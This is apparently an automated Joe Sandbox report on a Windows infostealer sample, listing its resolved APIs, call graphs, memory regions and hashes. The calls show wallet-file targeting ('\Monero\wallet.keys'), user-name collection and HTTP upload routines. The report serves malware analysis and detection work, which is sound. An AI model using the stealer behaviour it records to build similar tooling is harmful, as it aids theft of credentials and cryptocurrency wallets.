2fa8a0 lstrcpy 15992->15993 15994 2e52c2 15993->15994 15995 2fa9b0 4 API calls 15994->15995 15997 2e5303 15995->15997 15996->15943 15998 2fa920 3 API calls 15997->15998 15999 2e530a 15998->15999 16000 2fa8a0 lstrcpy 15999->16000 16001 2e5313 16000->16001 16002 2e5329 InternetConnectA 16001->16002 16002->15978 16003 2e5359 HttpOpenRequestA 16002->16003 16005 2e58b7 InternetCloseHandle 16003->16005 16006 2e53b7 16003->16006 16005->15978 16007 2fa9b0 4 API calls 16006->16007 16008 2e53cb 16007->16008 16009 2fa8a0 lstrcpy 16008->16009 16010 2e53d4 16009->16010 16011 2fa920 3 API calls 16010->16011 16012 2e53f2 16011->16012 16013 2fa8a0 lstrcpy 16012->16013 16014 2e53fb 16013->16014 16015 2fa9b0 4 API calls 16014->16015 16016 2e541a 16015->16016 16017 2fa8a0 lstrcpy 16016->16017 16018 2e5423 16017->16018 16019 2fa9b0 4 API calls 16018->16019 16020 2e5444 16019->16020 16021 2fa8a0 lstrcpy 16020->16021 16022 2e544d 16021->16022 16023 2fa9b0 4 API calls 16022->16023 16024 2e546e 16023->16024 16117 2f8ead CryptBinaryToStringA 16116->16117 16118 2f8ea9 16116->16118 16117->16118 16119 2f8ece GetProcessHeap RtlAllocateHeap 16117->16119 16118->15962 16119->16118 16120 2f8ef4 codecvt 16119->16120 16121 2f8f05 CryptBinaryToStringA 16120->16121 16121->16118 16125->15398 16368 2e9880 16126->16368 16128 2e98e1 16128->15405 16130 2fa740 lstrcpy 16129->16130 16131 2efb16 16130->16131 16303 2fa740 lstrcpy 16302->16303 16304 2f0266 16303->16304 16305 2f8de0 2 API calls 16304->16305 16306 2f027b 16305->16306 16307 2fa920 3 API calls 16306->16307 16308 2f028b 16307->16308 16309 2fa8a0 lstrcpy 16308->16309 16310 2f0294 16309->16310 16311 2fa9b0 4 API calls 16310->16311 16369 2e988e 16368->16369 16372 2e6fb0 16369->16372 16371 2e98ad codecvt 16371->16128 16375 2e6d40 16372->16375 16376 2e6d63 16375->16376 16390 2e6d59 16375->16390 16391 2e6530 16376->16391 16380 2e6dbe 16380->16390 16401 2e69b0 16380->16401 16382 2e6e2a 16383 2e6ee6 VirtualFree 16382->16383 16385 2e6ef7 16382->16385 16382->16390 16383->16385 16384 2e6f41 16388 2f89f0 2 API calls 16384->16388 16384->16390 16385->16384 16386 2e6f38 16385->16386 16387 2e6f26 FreeLibrary 16385->16387 16389 2f89f0 2 API calls 16386->16389 16387->16385 16388->16390 16389->16384 16390->16371 16392 2e6542 16391->16392 16394 2e6549 16392->16394 16411 2f8a10 GetProcessHeap RtlAllocateHeap 16392->16411 16394->16390 16395 2e6660 16394->16395 16398 2e668f VirtualAlloc 16395->16398 16397 2e6730 16399 2e673c 16397->16399 16400 2e6743 VirtualAlloc 16397->16400 16398->16397 16398->16399 16399->16380 16400->16399 16402 2e69c9 16401->16402 16406 2e69d5 16401->16406 16403 2e6a09 LoadLibraryA 16402->16403 16402->16406 16404 2e6a32 16403->16404 16403->16406 16408 2e6ae0 16404->16408 16412 2f8a10 GetProcessHeap RtlAllocateHeap 16404->16412 16406->16382 16407 2e6ba8 GetProcAddress 16407->16406 16407->16408 16408->16406 16408->16407 16409 2f89f0 2 API calls 16409->16408 16410 2e6a8b 16410->16406 16410->16409 16411->16394 16412->16410

                  Executed Functions

                  Function 002F9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 2f9860-2f9874 call 2f9750 663 2f987a-2f9a8e call 2f9780 GetProcAddress * 21 660->663 664 2f9a93-2f9af2 LoadLibraryA * 5 660->664 663->664 666 2f9b0d-2f9b14 664->666 667 2f9af4-2f9b08 GetProcAddress 664->667 668 2f9b46-2f9b4d 666->668 669 2f9b16-2f9b41 GetProcAddress * 2 666->669 667->666 671 2f9b4f-2f9b63 GetProcAddress 668->671 672 2f9b68-2f9b6f 668->672 669->668 671->672 673 2f9b89-2f9b90 672->673 674 2f9b71-2f9b84 GetProcAddress 672->674 675 2f9b92-2f9bbc GetProcAddress * 2 673->675 676 2f9bc1-2f9bc2 673->676 674->673 675->676
                  APIs
                  • GetProcAddress.KERNEL32(75900000,01320798), ref: 002F98A1
                  • GetProcAddress.KERNEL32(75900000,013207B0), ref: 002F98BA
                  • GetProcAddress.KERNEL32(75900000,01320660), ref: 002F98D2
                  • GetProcAddress.KERNEL32(75900000,013206C0), ref: 002F98EA
                  • GetProcAddress.KERNEL32(75900000,01320810), ref: 002F9903
                  • GetProcAddress.KERNEL32(75900000,013289A0), ref: 002F991B
                  • GetProcAddress.KERNEL32(75900000,013166E0), ref: 002F9933
                  • GetProcAddress.KERNEL32(75900000,013166A0), ref: 002F994C
                  • GetProcAddress.KERNEL32(75900000,01320828), ref: 002F9964
                  • GetProcAddress.KERNEL32(75900000,013207C8), ref: 002F997C
                  • GetProcAddress.KERNEL32(75900000,01320840), ref: 002F9995
                  • GetProcAddress.KERNEL32(75900000,01320570), ref: 002F99AD
                  • GetProcAddress.KERNEL32(75900000,01316A20), ref: 002F99C5
                  • GetProcAddress.KERNEL32(75900000,013206D8), ref: 002F99DE
                  • GetProcAddress.KERNEL32(75900000,01320558), ref: 002F99F6
                  • GetProcAddress.KERNEL32(75900000,013168A0), ref: 002F9A0E
                  • GetProcAddress.KERNEL32(75900000,01320588), ref: 002F9A27
                  • GetProcAddress.KERNEL32(75900000,013208B8), ref: 002F9A3F
                  • GetProcAddress.KERNEL32(75900000,013168E0), ref: 002F9A57
                  • GetProcAddress.KERNEL32(75900000,013208A0), ref: 002F9A70
                  • GetProcAddress.KERNEL32(75900000,01316980), ref: 002F9A88
                  • LoadLibraryA.KERNEL32(01320918,?,002F6A00), ref: 002F9A9A
                  • LoadLibraryA.KERNEL32(01320888,?,002F6A00), ref: 002F9AAB
                  • LoadLibraryA.KERNEL32(013208D0,?,002F6A00), ref: 002F9ABD
                  • LoadLibraryA.KERNEL32(013208E8,?,002F6A00), ref: 002F9ACF
                  • LoadLibraryA.KERNEL32(01320900,?,002F6A00), ref: 002F9AE0
                  • GetProcAddress.KERNEL32(75070000,01320858), ref: 002F9B02
                  • GetProcAddress.KERNEL32(75FD0000,01320870), ref: 002F9B23
                  • GetProcAddress.KERNEL32(75FD0000,01328D60), ref: 002F9B3B
                  • GetProcAddress.KERNEL32(75A50000,01328C88), ref: 002F9B5D
                  • GetProcAddress.KERNEL32(74E50000,01316820), ref: 002F9B7E
                  • GetProcAddress.KERNEL32(76E80000,01328830), ref: 002F9B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 002F9BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 002F9BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 117fb8522f797b90a8de9bf53af7bcd302b2d15e87de664398eef77ed47e074f
                  • Instruction ID: 39216a478210e6dbc83d92199b840f5c85ef397e055d3f487192f8b257407370
                  • Opcode Fuzzy Hash: 117fb8522f797b90a8de9bf53af7bcd302b2d15e87de664398eef77ed47e074f
                  • Instruction Fuzzy Hash: 1FA182B55002409FD368EF68FE88A6637F9FF6E301708452AE605C3225D739A44BFB56
                  Function 002E45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 2e45c0-2e4695 RtlAllocateHeap 781 2e46a0-2e46a6 764->781 782 2e474f-2e47a9 VirtualProtect 781->782 783 2e46ac-2e474a 781->783 783->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002E460E
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 002E479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E45D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E45DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E46CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E45C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E45E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E46B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E46C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4765
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E45F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E4729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E46AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002E46D8
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: dead8f4430503be1681f9af603bcbbc72235d5472bdef746680043e4560c0033
                  • Instruction ID: ecd6a28944c45def1800a647b67c366bb1fb44ad406fead3bb97e9507d248cc1
                  • Opcode Fuzzy Hash: dead8f4430503be1681f9af603bcbbc72235d5472bdef746680043e4560c0033
                  • Instruction Fuzzy Hash: 3541BD617F3684FAC629BBB4885EEDE3B165F42702F61D1C8EA23122C7CBB06504491B
                  Function 002E4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 2e4880-2e4942 call 2fa7a0 call 2e47b0 call 2fa740 * 5 InternetOpenA StrCmpCA 816 2e494b-2e494f 801->816 817 2e4944 801->817 818 2e4ecb-2e4ef3 InternetCloseHandle call 2faad0 call 2e9ac0 816->818 819 2e4955-2e4acd call 2f8b60 call 2fa920 call 2fa8a0 call 2fa800 * 2 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa920 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa920 call 2fa8a0 call 2fa800 * 2 InternetConnectA 816->819 817->816 829 2e4ef5-2e4f2d call 2fa820 call 2fa9b0 call 2fa8a0 call 2fa800 818->829 830 2e4f32-2e4fa2 call 2f8990 * 2 call 2fa7a0 call 2fa800 * 8 818->830 819->818 905 2e4ad3-2e4ad7 819->905 829->830 906 2e4ad9-2e4ae3 905->906 907 2e4ae5 905->907 908 2e4aef-2e4b22 HttpOpenRequestA 906->908 907->908 909 2e4ebe-2e4ec5 InternetCloseHandle 908->909 910 2e4b28-2e4e28 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa920 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa920 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa920 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa9b0 call 2fa8a0 call 2fa800 call 2fa920 call 2fa8a0 call 2fa800 call 2fa740 call 2fa920 * 2 call 2fa8a0 call 2fa800 * 2 call 2faad0 lstrlen call 2faad0 * 2 lstrlen call 2faad0 HttpSendRequestA 908->910 909->818 1021 2e4e32-2e4e5c InternetReadFile 910->1021 1022 2e4e5e-2e4e65 1021->1022 1023 2e4e67-2e4eb9 InternetCloseHandle call 2fa800 1021->1023 1022->1023 1024 2e4e69-2e4ea7 call 2fa9b0 call 2fa8a0 call 2fa800 1022->1024 1023->909 1024->1021
                  APIs
                    • Part of subcall function 002FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002FA7E6
                    • Part of subcall function 002E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002E4839
                    • Part of subcall function 002E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002E4849
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002E4915
                  • StrCmpCA.SHLWAPI(?,0132F360), ref: 002E493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002E4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00300DDB,00000000,?,?,00000000,?,",00000000,?,0132F300), ref: 002E4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002E4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002E4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002E4E49
                  • InternetCloseHandle.WININET(00000000), ref: 002E4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 002E4EC5
                  • HttpOpenRequestA.WININET(00000000,0132F2D0,?,0132EB40,00000000,00000000,00400100,00000000), ref: 002E4B15
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                  • InternetCloseHandle.WININET(00000000), ref: 002E4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 61c80be6dc7e0acc479703387d73f15affa9bfa582d30f877cdcbb0d8557604e
                  • Instruction ID: 357238d4c6b66167119d3c09de2ecefb7d09a38ed1ea33e06bd9bc90047ef5e2
                  • Opcode Fuzzy Hash: 61c80be6dc7e0acc479703387d73f15affa9bfa582d30f877cdcbb0d8557604e
                  • Instruction Fuzzy Hash: 2312CDB192111CAADB15EB50DD92FEEF378AF15780F5041B9B20A62091DFB02F59CF62
                  Function 002F7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002E11B7), ref: 002F7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 002F789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: cd4b4e4322c9a217f1b070b3910d457515ed1538d9790e71df0fafaccb2f83af
                  • Instruction ID: 7c649b083328a943a0a0c7b1156290c183245534b7b2ef2c7d52537bc06db7a7
